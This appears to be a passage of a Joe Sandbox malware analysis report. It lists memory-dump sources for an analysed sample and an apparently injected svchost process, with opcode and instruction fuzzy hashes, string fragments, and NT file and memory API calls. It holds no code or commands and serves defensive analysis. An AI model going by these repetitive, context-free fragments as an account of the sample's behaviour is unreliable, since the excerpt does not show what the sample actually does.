                                                                        • Instruction Fuzzy Hash: D431FCB5A00609AFDB14DF98DC41EEFB7BAEF88700F104209FE19A7240D770A9118FA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48008a8885a8a178e059b35dd08e41ed4daf0c7d0b3b076b6a9debccc8c5e9b1
                                                                        • Instruction ID: a0ffc68d7ceb59f9be611f6691e29e7b46312f5537168afb93b33e7e38059726
                                                                        • Opcode Fuzzy Hash: 48008a8885a8a178e059b35dd08e41ed4daf0c7d0b3b076b6a9debccc8c5e9b1
                                                                        • Instruction Fuzzy Hash: A7214CB5A00209AFDB14DF98CC41FAFB7B9EF89740F004109FE1897240D770A9118FA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3b62805aecb561c8d582efa8e853bcaa4f04543f9391eda20dae0d22279a175
                                                                        • Instruction ID: 454ac0ff2acc5311f07ce7587c2e93e4a618d20527ce109776e1a5c5603191b6
                                                                        • Opcode Fuzzy Hash: a3b62805aecb561c8d582efa8e853bcaa4f04543f9391eda20dae0d22279a175
                                                                        • Instruction Fuzzy Hash: B411C6B27802097BF320AA159C83FAB375E9F85B55F284004FB08AE2C1D6A4B8114BF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5231f87c4faa1c31e6d245ec425da63c60413e80fd13b1472b8af13470ab9c3
                                                                        • Instruction ID: 1267e141eb0dcb03fce36a95a64ac84b4b9483b032a3de7900a98218c27a431f
                                                                        • Opcode Fuzzy Hash: e5231f87c4faa1c31e6d245ec425da63c60413e80fd13b1472b8af13470ab9c3
                                                                        • Instruction Fuzzy Hash: 4F1193716007087BD720EF94CC45FAF7779EB85710F004549FE195B280D77069118FA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbfe9eea5b3d8900fe4173ac21f6f7afdb1c19ddaf0df59e9af0125fdf460ece
                                                                        • Instruction ID: 0f263ee52e0ab392873a9a21dd4d67464d60d9a599a44bbe6c8a726a1b80c87a
                                                                        • Opcode Fuzzy Hash: bbfe9eea5b3d8900fe4173ac21f6f7afdb1c19ddaf0df59e9af0125fdf460ece
                                                                        • Instruction Fuzzy Hash: 392121B6D0121DAF9B00DFA9D9418EFB7F9EF48304F14825EE919E7200E7705A058BE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99b439b0cb10a14fb0478847b80ce411d567114a137e28431b42ff8e2faf565b
                                                                        • Instruction ID: 7987ba3f95f053035018dde521b1b167f574a8accde964625a1d8d842171bbb2
                                                                        • Opcode Fuzzy Hash: 99b439b0cb10a14fb0478847b80ce411d567114a137e28431b42ff8e2faf565b
                                                                        • Instruction Fuzzy Hash: 86116071A00308BBD720EF94DC45FAFB7AAEF85740F104549FE186B280E77169158FA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 059ba52aad61e5139d8623b345dbbe53e1a12d0b40450d37b5105a3d0ea54d70
                                                                        • Instruction ID: e7d6494e36d91f8154fcd832cca3588112e097254f44ad5bf99b04e052710381
                                                                        • Opcode Fuzzy Hash: 059ba52aad61e5139d8623b345dbbe53e1a12d0b40450d37b5105a3d0ea54d70
                                                                        • Instruction Fuzzy Hash: 4B11F9B6D0121CAF8B40DFA9DD409EFBBF9EF48204F14456AE909E7200E7715A048FA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction ID: 5c274d54ae561054511db75124ad211b89c13c1866998e5ccdaf8599f0f7e909
                                                                        • Opcode Fuzzy Hash: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                        • Instruction Fuzzy Hash: 3201D2B2215108BBCB54DF99DC81EEB77AEAF8C754F408108BA19E3240D630F8518BA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff9e063acde6f9e72fdddd3ad8af59ed836a07fd28031e00596d0092fc8d44fc
                                                                        • Instruction ID: 92defd48feefff44e163a86c29f69d79dcfb48aadbd1913022a1ad2c95bfb407
                                                                        • Opcode Fuzzy Hash: ff9e063acde6f9e72fdddd3ad8af59ed836a07fd28031e00596d0092fc8d44fc
                                                                        • Instruction Fuzzy Hash: AA01C9B6D1121DAE8B40DFE8D941AEEBBF9BF18744F14466AD915E2200F77056048BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c5f4bffee225d14b924bc1f714eb79d08ba0ef5741ebe9563af9905981ef3755
                                                                        • Instruction ID: 692403c8c56f6df4059317449ac8e0fbdcad13c5a882972771a8cc872f02b3ef
                                                                        • Opcode Fuzzy Hash: c5f4bffee225d14b924bc1f714eb79d08ba0ef5741ebe9563af9905981ef3755
                                                                        • Instruction Fuzzy Hash: 13F0B4B360021667D7105A5DAC50BC6B79CEB893B8F240122FE5C97642E671E85187E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1635dbfa9e928d7a95508c0ef9cd9f1e711e410d6ca20e32e7ea2f8e357c6a8f
                                                                        • Instruction ID: 3b4873a1b939949065f2b23aab26470dd22c5f8d82250120fb4bbaedbf3047f5
                                                                        • Opcode Fuzzy Hash: 1635dbfa9e928d7a95508c0ef9cd9f1e711e410d6ca20e32e7ea2f8e357c6a8f
                                                                        • Instruction Fuzzy Hash: 26F01CB52002097BCB10DE99DC85E9B77ADEFC9750F008509BA1897241D770B9118BB4
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction ID: f4e281ada9d8764f2e00189b520acf3ecdcd5595161eeffcc32aaf03fd284994
                                                                        • Opcode Fuzzy Hash: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                        • Instruction Fuzzy Hash: A8E092B12042097BC724EE98DC41FAB37ADEFC5750F004419FE18A7241D630B8108BB4
                                                                        Memory Dump Source
• Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
Strings
• String ID: $.$F$P$e$i$l$m$o$o$r$s$x
• API String ID: 0-392141074
Strings
• String ID: D$\$e$e$i$l$n$r$r$w$x
• API String ID: 0-685823316
Strings
• String ID: P$e$i$kA;kA;$m$o$r${A;
• API String ID: 0-3297962327
Strings
• String ID: /$7$:$C$^$p
• API String ID: 0-1759222796
Strings
• String ID: 3$5$7$9
• API String ID: 0-1367519925

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 4.2%
Signature Coverage: 0.7%
Total number of Nodes: 452
Total number of Limit Nodes: 73

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_750000_svchost.jbxd
• String ID: 0$ }$!$,$/$1A$:t$;I$;X$@$Az$C$ER$Ex$L2M+$^$aG$n$n$r$v $wz${$~$r$r
• API String ID: 0-708521815
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 0076C744
• FindNextFileW.KERNELBASE(?,00000010), ref: 0076C77F
• FindClose.KERNELBASE(?), ref: 0076C78A
• API ID: Find$File$CloseFirstNext
• API String ID: 3541575487-0
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(?,?,?,000000F6,?,?,?,?,?,?,?), ref: 00779328
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                        • Instruction ID: d93a10c75c55c23aa7b39b491dfa9dd4dc86bd47d62ee2ac25d685fbca42fe5c
                                                                        • Opcode Fuzzy Hash: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                        • Instruction Fuzzy Hash: 3431CFB5A00248ABCB14DF98D885EEEB7B9EF88304F108219FD18A7240D734A951CBA5
                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,?,000000F6,?,?,?,?,?), ref: 00779473
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                        • Instruction ID: 25c5d867f60f7f049123ea2721d82f85be48fe0350f55ee7322f7a4fe00c6bd4
                                                                        • Opcode Fuzzy Hash: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                        • Instruction Fuzzy Hash: 2231E7B5A00248ABDB14DF98C881EEFB7B9EF88714F108219FD18A7340D774A951CFA1
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00761DEE,?,0077807F,00000000,00000004,00003000,?,?,?,?,?,0077807F,00761DEE), ref: 00779735
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                        • Instruction ID: 47355bc44af29de68487d05b79ac74169ad7a09c46ffc519bd50b6c95d323346
                                                                        • Opcode Fuzzy Hash: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                        • Instruction Fuzzy Hash: 00215CB5A00249AFDB14DF98CC85EEFB7B9EF88304F008209FD18A7240D774A911CBA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                        • Instruction ID: 348a5e5d79ff8f1a277c22c2c0d7bef6b74ef3131e21d08b9e81e6ca78d57088
                                                                        • Opcode Fuzzy Hash: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                        • Instruction Fuzzy Hash: A3119175600648BADA20EA58CC45FEF736CDB85715F008249FA186B181DB746905CBA1
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00779551
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction ID: ab6a8c7ea02aaebf0c12e04df4b7dfab90644d6781d6a545a836bb375c1c6105
                                                                        • Opcode Fuzzy Hash: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction Fuzzy Hash: E1E08C3A210204BBD620FB59CC45FEB77ACEFC5769F408419FA08A7242C670B90587F0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                                        • Instruction ID: 72c92bbcb24c92b6a2295692ef5c4e4972709a11658c111f7618beda93aab60a
                                                                        • Opcode Fuzzy Hash: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                                        • Instruction Fuzzy Hash: 4D900231605804129140B25848C458A4006D7F0301B95C012E0424958C8B148A565365
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                                        • Instruction ID: 09a6dc104a7221763c81892134439d020f2e9f20716e62529d814148475769c9
                                                                        • Opcode Fuzzy Hash: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                                        • Instruction Fuzzy Hash: 84900261601504424140B258484444A6006D7F13013D5C116A0554964C87188955926D
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                                        • Instruction ID: 4bca997d960333c53abf703bb35b18ff92955c10a8950eac8f555f58a6710de8
                                                                        • Opcode Fuzzy Hash: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                                        • Instruction Fuzzy Hash: 2690023160550802D100B258455474A1006C7E0301FA5C412A042496CD87958A5165A6
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                                        • Instruction ID: 7696a08e5a0c48e97cb664b4b09091bd128144885373470c9bf44bae4d9bad19
                                                                        • Opcode Fuzzy Hash: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                                        • Instruction Fuzzy Hash: 86900261202404034105B258445465A400BC7F0301B95C022E1014994DC72589916129
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                                        • Instruction ID: 5cb4092ec6905c91303e444233e23db69c8a7823047fe6b16d9bf8a262b4ba3a
                                                                        • Opcode Fuzzy Hash: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                                        • Instruction Fuzzy Hash: 7F90023120544C42D140B2584444A8A0016C7E0305F95C012A0064A98D97258E55B665
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                                        • Instruction ID: bfb556593fc9188f6595328e0eef3940e6ea9b95108cc597480273b1cd83c652
                                                                        • Opcode Fuzzy Hash: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                                        • Instruction Fuzzy Hash: 0F90023120140C02D180B258444468E0006C7E1301FD5C016A0025A58DCB158B5977A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                                        • Instruction ID: 11c38fe69be812629be4a4c4d52382f0f1785cab8268b41d6f3e95fd67f10d3c
                                                                        • Opcode Fuzzy Hash: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                                        • Instruction Fuzzy Hash: 9290023160540C02D150B258445478A0006C7E0301F95C012A0024A58D87558B5576A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                                        • Instruction ID: 69daad7016237f5548ded85334c572891d3c2dbd83542f723c1ab4b59bccc68d
                                                                        • Opcode Fuzzy Hash: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                                        • Instruction Fuzzy Hash: EA900435311404030105F75C074454F0047C7F53513D5C033F1015D54CD731CD715135
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                                        • Instruction ID: 3439920f6f3c2e2ce0ef6eb975adae44e9dbe64eb16bc2de4f4d596b8514799e
                                                                        • Opcode Fuzzy Hash: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                                        • Instruction Fuzzy Hash: 37900225221404020145F658064454F0446D7E63513D5C016F1416994CC72189655325
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                                        • Instruction ID: 47cdf6eec6ed39feeeb7053ae7b290b7846c0bf0ef8dc50b8db8d3e1c38d803e
                                                                        • Opcode Fuzzy Hash: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                                        • Instruction Fuzzy Hash: B490022124545502D150B25C444465A4006E7F0301F95C022A0814998D875589556225
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                                        • Instruction ID: c14d874ccc1f0c1e00700b0332997a2ac578efca10b798a98b9ae6454404502b
                                                                        • Opcode Fuzzy Hash: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                                        • Instruction Fuzzy Hash: F090026134140842D100B2584454B4A0006C7F1301F95C016E1064958D8719CD52612A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
